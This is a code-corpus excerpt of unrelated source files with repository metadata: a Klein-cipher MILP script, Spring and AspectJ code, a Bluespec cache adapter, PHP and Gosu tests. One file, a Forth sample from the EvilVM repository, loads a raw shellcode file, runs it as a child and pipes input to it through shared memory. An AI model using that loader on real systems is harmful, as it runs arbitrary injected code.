f.write("p.add_constraint(m["+str(mo3)+"] - x["+str(o6)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(mo4)+"] - x["+str(o7)+"] >= 0)"+'\n')
f.write("p.add_constraint(m["+str(mo4)+"] - x["+str(o8)+"] >= 0)"+'\n')
#Updates a and O for the S-box transformation
#in: a (difference vector), O (list of indices for objective function)
#out: a (difference vector), O (list of indices for objective function)
def subNibbles(a,O):
for i in range(0,16):
O.append(a[i])
return [a,O]
#Updates a for the Rotate Nibbles transformation
#in: a (difference vector)
#out: a (difference vector)
def rotateNibbles(a):
new_a=[]
for i in range(0,16):
new_a.append(a[(i+4)%16])
a=new_a
return a
#Updates a,next,dummy,CMC for the mixNibbles operation
#in: a (difference vector), m (byte difference vector for mixNibbles), next (the next unused index for a), dummy (the next unused #index for d), next_m (the next unused index for m), CMC (list of constraints implied by the mixNibbles operation)
#out: a (difference vector), m (byte difference vector for mixNibbles), next (the next unused index for a), dummy (the next unused #index for d), next_m (the next unused index for m), CMC (list of constraints implied by the mixNibbles operation)
def mixNibbles(a,m,next,dummy,next_m,CMC):
CMC.append([a[0],a[1],a[2],a[3],a[4],a[5],a[6],a[7],next,next+1,next+2,next+3,next+4,next+5,next+6,next+7,m[0],m[1],m[2],m[3],next_m,next_m+1,next_m+2,next_m+3,dummy])
dummy=dummy+1
next_m=next_m+4
for i in range(0,8):
a[i]=next
next=next+1
for i in range(0,4):
m[i]=next_m
next_m=next_m+1
CMC.append([a[8],a[9],a[10],a[11],a[12],a[13],a[14],a[15],next,next+1,next+2,next+3,next+4,next+5,next+6,next+7,m[0],m[1],m[2],m[3],next_m,next_m+1,next_m+2,next_m+3,dummy])
dummy=dummy+1
next_m=next_m+4
for i in range(8,16):
a[i]=next
next=next+1
for i in range(0,4):
m[i]=next_m
next_m=next_m+1
return [a,m,next,dummy,next_m,CMC]
#Updates a,m,next,dummy,next_m,O and CMC after one round
#in: a (difference vector), m (byte difference vector for mixNibbles), next (the next unused index for a), dummy (the next unused #index for d), next_m (the next unused index for m), O (list of indices for objective function), CMC (list of constraints implied by #the mixNibbles operation)
#out: a (difference vector), m (byte difference vector for mixNibbles), next (the next unused index for a), dummy (the next unused #index for d), next_m (the next unused index for m), O (list of indices for objective function), CMC (list of constraints implied by #the mixNibbles operation)
def round(a,m,next,dummy,next_m,O,CMC):
S=subNibbles(a,O)
a=S[0]
O=S[1]
a=rotateNibbles(a)
M=mixNibbles(a,m,next,dummy,next_m,CMC)
a=M[0]
m=M[1]
next=M[2]
dummy=M[3]
next_m=M[4]
CMC=M[5]
return [a,m,next,dummy,next_m,O,CMC]
#Generates a MILP (Sage) for calculating the minimum number of active S-boxes for 'rounds' rounds of Klein with in the non-related key #setting and solves this program using the "Coin" solver
#in: rounds (the number of rounds)
#out: the MILP (for calculating the minimum number of active S-boxes for 'rounds' rounds of Klein in the non-related key setting and #prints the solution of this program
def giveEquationsKleinandSolve(rounds):
next=0 #next unused state/key variable index
dummy=0 #next unused dummy variable index
next_m=4 #next unused state byte variable index
a=[] #state variable
k=[] #key variable
m=[0,1,2,3] #state byte variable
O=[] #list of indices for objective function
CMC=[] #list of constraints implied by the MixColumn operation
CA=[] #list of indices for constraint to ensure not all inputs are zero
for i in range(0,16):
a.append(next)
CA.append(next)
next=next+1
for i in range(0,rounds):
NR=round(a,m,next,dummy,next_m,O,CMC)
a=NR[0]
m=NR[1]
next=NR[2]
dummy=NR[3]
next_m=NR[4]
O=NR[5]
CMC=NR[6]
f = open('Eq-Klein-With-'+str(rounds)+'-Rounds-Differential.sage','w')
f.write("p = MixedIntegerLinearProgram(maximization=False, solver=\"Coin\")"+'\n')
f.write("x = p.new_variable(binary=True)"+'\n')
f.write("d = p.new_variable(binary=True)"+'\n')
f.write("m = p.new_variable(binary=True)"+'\n')
f.write('\n')
f.write("p.set_objective(" )
for i in range (0, len(O)-1):
f.write("x["+str(O[i])+"] + ")
f.write("x["+str(O[len(O)-1])+"])"+'\n')
f.write('\n')
f.write("p.add_constraint(")
for i in range (0, len(CA)-1):
f.write("x["+str(CA[i])+"] + ")
f.write("x["+str(CA[len(CA)-1])+"] >= 1)"+'\n')
for i in range (0, len(CMC)):
EqMC(CMC[i][0],CMC[i][1],CMC[i][2],CMC[i][3],CMC[i][4],CMC[i][5],CMC[i][6],CMC[i][7],CMC[i][8],CMC[i][9],CMC[i][10],CMC[i][11],CMC[i][12],CMC[i][13],CMC[i][14],CMC[i][15],CMC[i][16],CMC[i][17],CMC[i][18],CMC[i][19],CMC[i][20],CMC[i][21],CMC[i][22],CMC[i][23],CMC[i][24],f)
f.write('\n')
f.write("solution=p.solve()"+'\n')
f.write("print \"Minimal number of S-boxes:\", solution"+'\n')
f.close()
execfile('Eq-Klein-With-'+str(rounds)+'-Rounds-Differential.sage')
giveEquationsKleinandSolve(4) | Sage | 4 | Deadlyelder/Crypto-Tools | S-Box MILP tool/Klein.sage | [
"Unlicense"
] |
: consume key? if key drop tail then ;
here ,file bins\mem.shellcode
16 + value mem-code
variable shmem
shmem off
loadlib api-ms-win-core-synch-l1-2-0.dll
value synch.dll
synch.dll 1 dllfun WakeByAddressAll WakeByAddressAll
synch.dll 4 dllfun WaitOnAddress WaitOnAddress
: test mem-code shmem clone ;
: >child? shmem 2 + c@ 0= ;
: <child? shmem c@ ;
: >child shmem 3 + c! 255 shmem 2 + c! shmem 2 + WakeByAddressAll drop ;
: <child shmem 1+ c@ 0 shmem c! shmem WakeByAddressAll drop ;
: read-child
consume begin
key? 0= while
<child? if <child emit else 1 ms then
repeat
consume
;
variable going
: wait begin >child? 0= key? 0= and while 1 ms repeat ;
: stream
bounds do
going on begin
going @ while
>child? if i c@ >child going off then
<child? if <child emit going off then
key? if consume unloop return then
repeat
loop
;
: interact ( -- )
readline loadfile if
consume
.pre
.s bounds do
going on begin
going @ while
>child? if i c@ >child going off then
<child? if <child emit going off then
key? if consume unloop return then
repeat
loop
." Done loading file\n"
.post
then
;
: wait begin >child? 0= key? 0= and while 1 ms repeat ;
: xmit bounds do wait i c@ >child loop ;
: send .pre readline stream read-child .post ;
: test test .pre read-child .post ;
| Forth | 4 | jephthai/EvilVM | samples/child.fth | [
"MIT"
] |
;; Hello, world in Jess!
(printout t "Hello from Jess!" crlf)
| CLIPS | 2 | DBatOWL/tutorials | rule-engines/jess/src/main/resources/helloJess.clp | [
"MIT"
] |
// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO.
// You may push code into the target .java compilation unit if you wish to edit any member(s).
package com.journaldev.web;
import com.journaldev.jpa.data.Employee;
import com.journaldev.jpa.data.Phone;
import com.journaldev.web.PhoneBean;
import com.journaldev.web.converter.EmployeeConverter;
import com.journaldev.web.util.MessageFactory;
import java.util.ArrayList;
import java.util.List;
import javax.annotation.PostConstruct;
import javax.el.ELContext;
import javax.el.ExpressionFactory;
import javax.faces.application.FacesMessage;
import javax.faces.bean.ManagedBean;
import javax.faces.bean.SessionScoped;
import javax.faces.component.html.HtmlOutputText;
import javax.faces.component.html.HtmlPanelGrid;
import javax.faces.context.FacesContext;
import javax.faces.validator.LengthValidator;
import org.primefaces.component.autocomplete.AutoComplete;
import org.primefaces.component.inputtext.InputText;
import org.primefaces.component.message.Message;
import org.primefaces.component.outputlabel.OutputLabel;
import org.primefaces.context.RequestContext;
import org.primefaces.event.CloseEvent;
privileged aspect PhoneBean_Roo_ManagedBean {
declare @type: PhoneBean: @ManagedBean(name = "phoneBean");
declare @type: PhoneBean: @SessionScoped;
private String PhoneBean.name = "Phones";
private Phone PhoneBean.phone;
private List<Phone> PhoneBean.allPhones;
private boolean PhoneBean.dataVisible = false;
private List<String> PhoneBean.columns;
private HtmlPanelGrid PhoneBean.createPanelGrid;
private HtmlPanelGrid PhoneBean.editPanelGrid;
private HtmlPanelGrid PhoneBean.viewPanelGrid;
private boolean PhoneBean.createDialogVisible = false;
@PostConstruct
public void PhoneBean.init() {
columns = new ArrayList<String>();
columns.add("phNo");
}
public String PhoneBean.getName() {
return name;
}
public List<String> PhoneBean.getColumns() {
return columns;
}
public List<Phone> PhoneBean.getAllPhones() {
return allPhones;
}
public void PhoneBean.setAllPhones(List<Phone> allPhones) {
this.allPhones = allPhones;
}
public String PhoneBean.findAllPhones() {
allPhones = Phone.findAllPhones();
dataVisible = !allPhones.isEmpty();
return null;
}
public boolean PhoneBean.isDataVisible() {
return dataVisible;
}
public void PhoneBean.setDataVisible(boolean dataVisible) {
this.dataVisible = dataVisible;
}
public HtmlPanelGrid PhoneBean.getCreatePanelGrid() {
if (createPanelGrid == null) {
createPanelGrid = populateCreatePanel();
}
return createPanelGrid;
}
public void PhoneBean.setCreatePanelGrid(HtmlPanelGrid createPanelGrid) {
this.createPanelGrid = createPanelGrid;
}
public HtmlPanelGrid PhoneBean.getEditPanelGrid() {
if (editPanelGrid == null) {
editPanelGrid = populateEditPanel();
}
return editPanelGrid;
}
public void PhoneBean.setEditPanelGrid(HtmlPanelGrid editPanelGrid) {
this.editPanelGrid = editPanelGrid;
}
public HtmlPanelGrid PhoneBean.getViewPanelGrid() {
return populateViewPanel();
}
public void PhoneBean.setViewPanelGrid(HtmlPanelGrid viewPanelGrid) {
this.viewPanelGrid = viewPanelGrid;
}
public HtmlPanelGrid PhoneBean.populateCreatePanel() {
FacesContext facesContext = FacesContext.getCurrentInstance();
javax.faces.application.Application application = facesContext.getApplication();
ExpressionFactory expressionFactory = application.getExpressionFactory();
ELContext elContext = facesContext.getELContext();
HtmlPanelGrid htmlPanelGrid = (HtmlPanelGrid) application.createComponent(HtmlPanelGrid.COMPONENT_TYPE);
OutputLabel empIdCreateOutput = (OutputLabel) application.createComponent(OutputLabel.COMPONENT_TYPE);
empIdCreateOutput.setFor("empIdCreateInput");
empIdCreateOutput.setId("empIdCreateOutput");
empIdCreateOutput.setValue("Emp Id:");
htmlPanelGrid.getChildren().add(empIdCreateOutput);
AutoComplete empIdCreateInput = (AutoComplete) application.createComponent(AutoComplete.COMPONENT_TYPE);
empIdCreateInput.setId("empIdCreateInput");
empIdCreateInput.setValueExpression("value", expressionFactory.createValueExpression(elContext, "#{phoneBean.phone.empId}", Employee.class));
empIdCreateInput.setCompleteMethod(expressionFactory.createMethodExpression(elContext, "#{phoneBean.completeEmpId}", List.class, new Class[] { String.class }));
empIdCreateInput.setDropdown(true);
empIdCreateInput.setValueExpression("var", expressionFactory.createValueExpression(elContext, "empId", String.class));
empIdCreateInput.setValueExpression("itemLabel", expressionFactory.createValueExpression(elContext, "#{empId.empName} #{empId.empHireDate} #{empId.empSalary} #{empId.empId}", String.class));
empIdCreateInput.setValueExpression("itemValue", expressionFactory.createValueExpression(elContext, "#{empId}", Employee.class));
empIdCreateInput.setConverter(new EmployeeConverter());
empIdCreateInput.setRequired(false);
htmlPanelGrid.getChildren().add(empIdCreateInput);
Message empIdCreateInputMessage = (Message) application.createComponent(Message.COMPONENT_TYPE);
empIdCreateInputMessage.setId("empIdCreateInputMessage");
empIdCreateInputMessage.setFor("empIdCreateInput");
empIdCreateInputMessage.setDisplay("icon");
htmlPanelGrid.getChildren().add(empIdCreateInputMessage);
OutputLabel phNoCreateOutput = (OutputLabel) application.createComponent(OutputLabel.COMPONENT_TYPE);
phNoCreateOutput.setFor("phNoCreateInput");
phNoCreateOutput.setId("phNoCreateOutput");
phNoCreateOutput.setValue("Ph No:");
htmlPanelGrid.getChildren().add(phNoCreateOutput);
InputText phNoCreateInput = (InputText) application.createComponent(InputText.COMPONENT_TYPE);
phNoCreateInput.setId("phNoCreateInput");
phNoCreateInput.setValueExpression("value", expressionFactory.createValueExpression(elContext, "#{phoneBean.phone.phNo}", String.class));
LengthValidator phNoCreateInputValidator = new LengthValidator();
phNoCreateInputValidator.setMaximum(30);
phNoCreateInput.addValidator(phNoCreateInputValidator);
phNoCreateInput.setRequired(true);
htmlPanelGrid.getChildren().add(phNoCreateInput);
Message phNoCreateInputMessage = (Message) application.createComponent(Message.COMPONENT_TYPE);
phNoCreateInputMessage.setId("phNoCreateInputMessage");
phNoCreateInputMessage.setFor("phNoCreateInput");
phNoCreateInputMessage.setDisplay("icon");
htmlPanelGrid.getChildren().add(phNoCreateInputMessage);
return htmlPanelGrid;
}
public HtmlPanelGrid PhoneBean.populateEditPanel() {
FacesContext facesContext = FacesContext.getCurrentInstance();
javax.faces.application.Application application = facesContext.getApplication();
ExpressionFactory expressionFactory = application.getExpressionFactory();
ELContext elContext = facesContext.getELContext();
HtmlPanelGrid htmlPanelGrid = (HtmlPanelGrid) application.createComponent(HtmlPanelGrid.COMPONENT_TYPE);
OutputLabel empIdEditOutput = (OutputLabel) application.createComponent(OutputLabel.COMPONENT_TYPE);
empIdEditOutput.setFor("empIdEditInput");
empIdEditOutput.setId("empIdEditOutput");
empIdEditOutput.setValue("Emp Id:");
htmlPanelGrid.getChildren().add(empIdEditOutput);
AutoComplete empIdEditInput = (AutoComplete) application.createComponent(AutoComplete.COMPONENT_TYPE);
empIdEditInput.setId("empIdEditInput");
empIdEditInput.setValueExpression("value", expressionFactory.createValueExpression(elContext, "#{phoneBean.phone.empId}", Employee.class));
empIdEditInput.setCompleteMethod(expressionFactory.createMethodExpression(elContext, "#{phoneBean.completeEmpId}", List.class, new Class[] { String.class }));
empIdEditInput.setDropdown(true);
empIdEditInput.setValueExpression("var", expressionFactory.createValueExpression(elContext, "empId", String.class));
empIdEditInput.setValueExpression("itemLabel", expressionFactory.createValueExpression(elContext, "#{empId.empName} #{empId.empHireDate} #{empId.empSalary} #{empId.empId}", String.class));
empIdEditInput.setValueExpression("itemValue", expressionFactory.createValueExpression(elContext, "#{empId}", Employee.class));
empIdEditInput.setConverter(new EmployeeConverter());
empIdEditInput.setRequired(false);
htmlPanelGrid.getChildren().add(empIdEditInput);
Message empIdEditInputMessage = (Message) application.createComponent(Message.COMPONENT_TYPE);
empIdEditInputMessage.setId("empIdEditInputMessage");
empIdEditInputMessage.setFor("empIdEditInput");
empIdEditInputMessage.setDisplay("icon");
htmlPanelGrid.getChildren().add(empIdEditInputMessage);
OutputLabel phNoEditOutput = (OutputLabel) application.createComponent(OutputLabel.COMPONENT_TYPE);
phNoEditOutput.setFor("phNoEditInput");
phNoEditOutput.setId("phNoEditOutput");
phNoEditOutput.setValue("Ph No:");
htmlPanelGrid.getChildren().add(phNoEditOutput);
InputText phNoEditInput = (InputText) application.createComponent(InputText.COMPONENT_TYPE);
phNoEditInput.setId("phNoEditInput");
phNoEditInput.setValueExpression("value", expressionFactory.createValueExpression(elContext, "#{phoneBean.phone.phNo}", String.class));
LengthValidator phNoEditInputValidator = new LengthValidator();
phNoEditInputValidator.setMaximum(30);
phNoEditInput.addValidator(phNoEditInputValidator);
phNoEditInput.setRequired(true);
htmlPanelGrid.getChildren().add(phNoEditInput);
Message phNoEditInputMessage = (Message) application.createComponent(Message.COMPONENT_TYPE);
phNoEditInputMessage.setId("phNoEditInputMessage");
phNoEditInputMessage.setFor("phNoEditInput");
phNoEditInputMessage.setDisplay("icon");
htmlPanelGrid.getChildren().add(phNoEditInputMessage);
return htmlPanelGrid;
}
public HtmlPanelGrid PhoneBean.populateViewPanel() {
FacesContext facesContext = FacesContext.getCurrentInstance();
javax.faces.application.Application application = facesContext.getApplication();
ExpressionFactory expressionFactory = application.getExpressionFactory();
ELContext elContext = facesContext.getELContext();
HtmlPanelGrid htmlPanelGrid = (HtmlPanelGrid) application.createComponent(HtmlPanelGrid.COMPONENT_TYPE);
HtmlOutputText empIdLabel = (HtmlOutputText) application.createComponent(HtmlOutputText.COMPONENT_TYPE);
empIdLabel.setId("empIdLabel");
empIdLabel.setValue("Emp Id:");
htmlPanelGrid.getChildren().add(empIdLabel);
HtmlOutputText empIdValue = (HtmlOutputText) application.createComponent(HtmlOutputText.COMPONENT_TYPE);
empIdValue.setValueExpression("value", expressionFactory.createValueExpression(elContext, "#{phoneBean.phone.empId}", Employee.class));
empIdValue.setConverter(new EmployeeConverter());
htmlPanelGrid.getChildren().add(empIdValue);
HtmlOutputText phNoLabel = (HtmlOutputText) application.createComponent(HtmlOutputText.COMPONENT_TYPE);
phNoLabel.setId("phNoLabel");
phNoLabel.setValue("Ph No:");
htmlPanelGrid.getChildren().add(phNoLabel);
HtmlOutputText phNoValue = (HtmlOutputText) application.createComponent(HtmlOutputText.COMPONENT_TYPE);
phNoValue.setId("phNoValue");
phNoValue.setValueExpression("value", expressionFactory.createValueExpression(elContext, "#{phoneBean.phone.phNo}", String.class));
htmlPanelGrid.getChildren().add(phNoValue);
return htmlPanelGrid;
}
public Phone PhoneBean.getPhone() {
if (phone == null) {
phone = new Phone();
}
return phone;
}
public void PhoneBean.setPhone(Phone phone) {
this.phone = phone;
}
public List<Employee> PhoneBean.completeEmpId(String query) {
List<Employee> suggestions = new ArrayList<Employee>();
for (Employee employee : Employee.findAllEmployees()) {
String employeeStr = String.valueOf(employee.getEmpName() + " " + employee.getEmpHireDate() + " " + employee.getEmpSalary() + " " + employee.getEmpId());
if (employeeStr.toLowerCase().startsWith(query.toLowerCase())) {
suggestions.add(employee);
}
}
return suggestions;
}
public String PhoneBean.onEdit() {
return null;
}
public boolean PhoneBean.isCreateDialogVisible() {
return createDialogVisible;
}
public void PhoneBean.setCreateDialogVisible(boolean createDialogVisible) {
this.createDialogVisible = createDialogVisible;
}
public String PhoneBean.displayList() {
createDialogVisible = false;
findAllPhones();
return "phone";
}
public String PhoneBean.displayCreateDialog() {
phone = new Phone();
createDialogVisible = true;
return "phone";
}
public String PhoneBean.persist() {
String message = "";
if (phone.getPhId() != null) {
phone.merge();
message = "message_successfully_updated";
} else {
phone.persist();
message = "message_successfully_created";
}
RequestContext context = RequestContext.getCurrentInstance();
context.execute("createDialogWidget.hide()");
context.execute("editDialogWidget.hide()");
FacesMessage facesMessage = MessageFactory.getMessage(message, "Phone");
FacesContext.getCurrentInstance().addMessage(null, facesMessage);
reset();
return findAllPhones();
}
public String PhoneBean.delete() {
phone.remove();
FacesMessage facesMessage = MessageFactory.getMessage("message_successfully_deleted", "Phone");
FacesContext.getCurrentInstance().addMessage(null, facesMessage);
reset();
return findAllPhones();
}
public void PhoneBean.reset() {
phone = null;
createDialogVisible = false;
}
public void PhoneBean.handleDialogClose(CloseEvent event) {
reset();
}
}
| AspectJ | 3 | ghiloufibelgacem/jornaldev | PrimeFaces/Primefaces-SpringRoo-Hibernate-Sample/src/main/java/com/journaldev/web/PhoneBean_Roo_ManagedBean.aj | [
"MIT"
] |
/*
* Copyright 2012-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.actuate.health;
import java.util.Collections;
import java.util.Iterator;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatIllegalArgumentException;
import static org.assertj.core.api.Assertions.assertThatIllegalStateException;
import static org.mockito.BDDMockito.given;
import static org.mockito.Mockito.mock;
/**
* Tests for {@link DefaultContributorRegistry}.
*
* @author Phillip Webb
* @author Vedran Pavic
* @author Stephane Nicoll
*/
abstract class DefaultContributorRegistryTests {
private final HealthIndicator one = mock(HealthIndicator.class);
private final HealthIndicator two = mock(HealthIndicator.class);
private ContributorRegistry<HealthIndicator> registry;
@BeforeEach
void setUp() {
given(this.one.health()).willReturn(new Health.Builder().unknown().withDetail("1", "1").build());
given(this.two.health()).willReturn(new Health.Builder().unknown().withDetail("2", "2").build());
this.registry = new DefaultContributorRegistry<>();
}
@Test
void createWhenContributorsIsNullThrowsException() {
assertThatIllegalArgumentException().isThrownBy(() -> new DefaultContributorRegistry<>(null))
.withMessage("Contributors must not be null");
}
@Test
void createWhenNameFactoryIsNullThrowsException() {
assertThatIllegalArgumentException()
.isThrownBy(() -> new DefaultContributorRegistry<>(Collections.emptyMap(), null))
.withMessage("NameFactory must not be null");
}
@Test
void createUsesHealthIndicatorNameFactoryByDefault() {
this.registry = new DefaultContributorRegistry<>(Collections.singletonMap("oneHealthIndicator", this.one));
assertThat(this.registry.getContributor("oneHealthIndicator")).isNull();
assertThat(this.registry.getContributor("one")).isNotNull();
}
@Test
void createWithCustomNameFactoryAppliesFunctionToName() {
this.registry = new DefaultContributorRegistry<>(Collections.singletonMap("one", this.one), this::reverse);
assertThat(this.registry.getContributor("one")).isNull();
assertThat(this.registry.getContributor("eno")).isNotNull();
}
@Test
void registerContributorWhenNameIsNullThrowsException() {
assertThatIllegalArgumentException().isThrownBy(() -> this.registry.registerContributor(null, this.one))
.withMessage("Name must not be null");
}
@Test
void registerContributorWhenContributorIsNullThrowsException() {
assertThatIllegalArgumentException().isThrownBy(() -> this.registry.registerContributor("one", null))
.withMessage("Contributor must not be null");
}
@Test
void registerContributorRegistersContributors() {
this.registry.registerContributor("one", this.one);
this.registry.registerContributor("two", this.two);
assertThat(this.registry).hasSize(2);
assertThat(this.registry.getContributor("one")).isSameAs(this.one);
assertThat(this.registry.getContributor("two")).isSameAs(this.two);
}
@Test
void registerContributorWhenNameAlreadyUsedThrowsException() {
this.registry.registerContributor("one", this.one);
assertThatIllegalStateException().isThrownBy(() -> this.registry.registerContributor("one", this.two))
.withMessageContaining("A contributor named \"one\" has already been registered");
}
@Test
void registerContributorUsesNameFactory() {
this.registry.registerContributor("oneHealthIndicator", this.one);
assertThat(this.registry.getContributor("oneHealthIndicator")).isNull();
assertThat(this.registry.getContributor("one")).isNotNull();
}
@Test
void unregisterContributorUnregistersContributor() {
this.registry.registerContributor("one", this.one);
this.registry.registerContributor("two", this.two);
assertThat(this.registry).hasSize(2);
HealthIndicator two = this.registry.unregisterContributor("two");
assertThat(two).isSameAs(this.two);
assertThat(this.registry).hasSize(1);
}
@Test
void unregisterContributorWhenUnknownReturnsNull() {
this.registry.registerContributor("one", this.one);
assertThat(this.registry).hasSize(1);
HealthIndicator two = this.registry.unregisterContributor("two");
assertThat(two).isNull();
assertThat(this.registry).hasSize(1);
}
@Test
void unregisterContributorUsesNameFactory() {
this.registry.registerContributor("oneHealthIndicator", this.one);
assertThat(this.registry.getContributor("oneHealthIndicator")).isNull();
assertThat(this.registry.getContributor("one")).isNotNull();
}
@Test
void getContributorReturnsContributor() {
this.registry.registerContributor("one", this.one);
assertThat(this.registry.getContributor("one")).isEqualTo(this.one);
}
@Test
void iteratorIteratesContributors() {
this.registry.registerContributor("one", this.one);
this.registry.registerContributor("two", this.two);
Iterator<NamedContributor<HealthIndicator>> iterator = this.registry.iterator();
NamedContributor<HealthIndicator> first = iterator.next();
NamedContributor<HealthIndicator> second = iterator.next();
assertThat(iterator.hasNext()).isFalse();
assertThat(first.getName()).isEqualTo("one");
assertThat(first.getContributor()).isEqualTo(this.one);
assertThat(second.getName()).isEqualTo("two");
assertThat(second.getContributor()).isEqualTo(this.two);
}
private String reverse(String name) {
return new StringBuilder(name).reverse().toString();
}
}
| Java | 5 | techAi007/spring-boot | spring-boot-project/spring-boot-actuator/src/test/java/org/springframework/boot/actuate/health/DefaultContributorRegistryTests.java | [
"Apache-2.0"
] |
// Copyright (c) 2016-2021 Bluespec, Inc. All Rights Reserved.
// This module transforms an L1's L2-facing interface
// (i.e., l1_to_l2_client and l2_to_l1_server)
// to the ChildCacheToParent interface required by the L2.
package L1_IFC_Adapter;
// ================================================================
export mkL1_IFC_Adapter;
// ================================================================
// BSV lib imports
import ConfigReg :: *;
import Vector :: *;
import FIFOF :: *;
import GetPut :: *;
import ClientServer :: *;
import Connectable :: *;
// ----------------
// BSV additional libs
import Cur_Cycle :: *;
import GetPut_Aux :: *;
import Semi_FIFOF :: *;
// ----------------
// Project imports
import MMU_Cache_Common :: *;
import Cache_Decls :: *;
import LLCache_Aux :: *;
import CacheUtils :: *;
import CCTypes :: *;
// ================================================================
// Interface type-conversion:
// from L1 Cache's L2_to_L2_Client and L2_to_L1_Server interfaces
// to L1LLConnect's ChildCacheToParent interface
function CCTypes::Msi fv_Meta_State_to_Msi (Meta_State s);
return (case (s)
META_INVALID: I;
META_SHARED: S;
META_EXCLUSIVE: E;
META_MODIFIED: M;
endcase);
endfunction
function Meta_State fv_Msi_to_Meta_State (CCTypes::Msi s);
return (case (s)
I: META_INVALID;
S: META_SHARED;
E: META_EXCLUSIVE;
M: META_MODIFIED;
endcase);
endfunction
function Maybe #(CCTypes::Line) fv_M_CLine_to_M_Line (Maybe #(CLine) m_cline);
return (case (m_cline) matches
tagged Invalid: tagged Invalid;
tagged Valid .x: tagged Valid (unpack (x));
endcase);
endfunction
function Maybe #(CLine) fv_M_Line_to_M_CLine (Maybe #(CCTypes::Line) m_line);
return (case (m_line) matches
tagged Invalid: tagged Invalid;
tagged Valid .x: tagged Valid (pack (x));
endcase);
endfunction
// ----------------
module mkL1_IFC_Adapter #(Integer verbosity_L1_L2,
Integer id,
Client_Semi_FIFOF #(L1_to_L2_Req, L2_to_L1_Rsp) l1_to_l2_client,
Server_Semi_FIFOF #(L2_to_L1_Req, L1_to_L2_Rsp) l2_to_l1_server)
(ChildCacheToParent #(L1Way, void));
interface FifoDeq rsToP; // #(CRsMsg #(void))
method Bool notEmpty;
return l2_to_l1_server.response.notEmpty;
endmethod
method Action deq;
l2_to_l1_server.response.deq;
if (verbosity_L1_L2 >= 2) begin
L1_to_L2_Rsp rsp = l2_to_l1_server.response.first;
$display ("%0d: L1_IFC_Adapter [%0d]: ", cur_cycle, id, fshow_L1_to_L2_Rsp (rsp));
end
endmethod
method CRsMsg #(void) first;
L1_to_L2_Rsp rsp = l2_to_l1_server.response.first;
let cRsMsg = CRsMsg {addr: rsp.addr,
toState: fv_Meta_State_to_Msi (rsp.to_state),
data: fv_M_CLine_to_M_Line (rsp.m_cline),
child: ? };
return cRsMsg;
endmethod
endinterface
interface FifoDeq rqToP; // #(CRqMsg #(L1Way, void))
method Bool notEmpty;
return l1_to_l2_client.request.notEmpty;
endmethod
method Action deq;
l1_to_l2_client.request.deq;
if (verbosity_L1_L2 >= 2) begin
L1_to_L2_Req req = l1_to_l2_client.request.first;
$display ("%0d: L1_IFC_Adapter [%0d]: ", cur_cycle, id, fshow_L1_to_L2_Req (req));
end
endmethod
method CRqMsg #(L1Way, void) first;
L1_to_L2_Req req = l1_to_l2_client.request.first;
let cRqMsg = CRqMsg {addr: req.addr,
fromState: fv_Meta_State_to_Msi (req.from_state),
toState: fv_Meta_State_to_Msi (req.to_state),
canUpToE: req.can_up_to_E,
id: ?,
child: ? };
return cRqMsg;
endmethod
endinterface
interface FifoEnq fromP; // #(PRqRsMsg #(L1Way, void)
method Bool notFull;
return (l1_to_l2_client.response.notFull
&& l2_to_l1_server.request.notFull);
endmethod
method Action enq (PRqRsMsg #(L1Way, void) x);
case (x) matches
tagged PRq .prq:
begin
let req = L2_to_L1_Req {addr: prq.addr,
to_state: fv_Msi_to_Meta_State (prq.toState) };
// Note: prq.child is discarded
l2_to_l1_server.request.enq (req);
if (verbosity_L1_L2 >= 2)
$display ("%0d: L1_IFC_Adapter [%0d]: ", cur_cycle, id,
fshow_L2_to_L1_Req (req));
end
tagged PRs .prs:
begin
let rsp = L2_to_L1_Rsp {addr: prs.addr,
to_state: fv_Msi_to_Meta_State (prs.toState),
m_cline: fv_M_Line_to_M_CLine (prs.data) };
l1_to_l2_client.response.enq (rsp);
if (verbosity_L1_L2 >= 2)
$display ("%0d: L1_IFC_Adapter [%0d]: ", cur_cycle, id,
fshow_L2_to_L1_Rsp (rsp));
end
endcase
endmethod
endinterface
endmodule
// ================================================================
endpackage
| Bluespec | 5 | darius-bluespec/Flute | src_Core/Near_Mem_VM_WB_L1_L2/L1_IFC_Adapter.bsv | [
"Apache-2.0"
] |
fn this_is_obviously(not: a, toml: file) {
}
| TOML | 0 | Eric-Arellano/rust | src/tools/clippy/tests/ui-toml/bad_toml/clippy.toml | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
economy
fred
add dgs5,dgs10
pred
rmv dgs10
reset
add dgs2
pred
mc
regression
lstm --epochs 2
knn
exit | Gosu | 0 | minhhoang1023/GamestonkTerminal | scripts/test_economy_fred_pred.gst | [
"MIT"
] |
--TEST--
JIT ASSIGN: Assign to typed reference should return modified value
--INI--
opcache.enable=1
opcache.enable_cli=1
opcache.file_update_protection=0
opcache.jit_buffer_size=1M
opcache.protect_memory=1
--FILE--
<?php
class Test {
public ?string $prop;
}
function test($val) {
$obj = new Test;
$ref =& $obj->prop;
var_dump($ref = $val);
}
test(0);
?>
--EXPECT--
string(1) "0" | PHP | 4 | NathanFreeman/php-src | ext/opcache/tests/jit/assign_041.phpt | [
"PHP-3.01"
] |
/*
Copyright © 2011, 2012 MLstate
This file is part of Opa.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
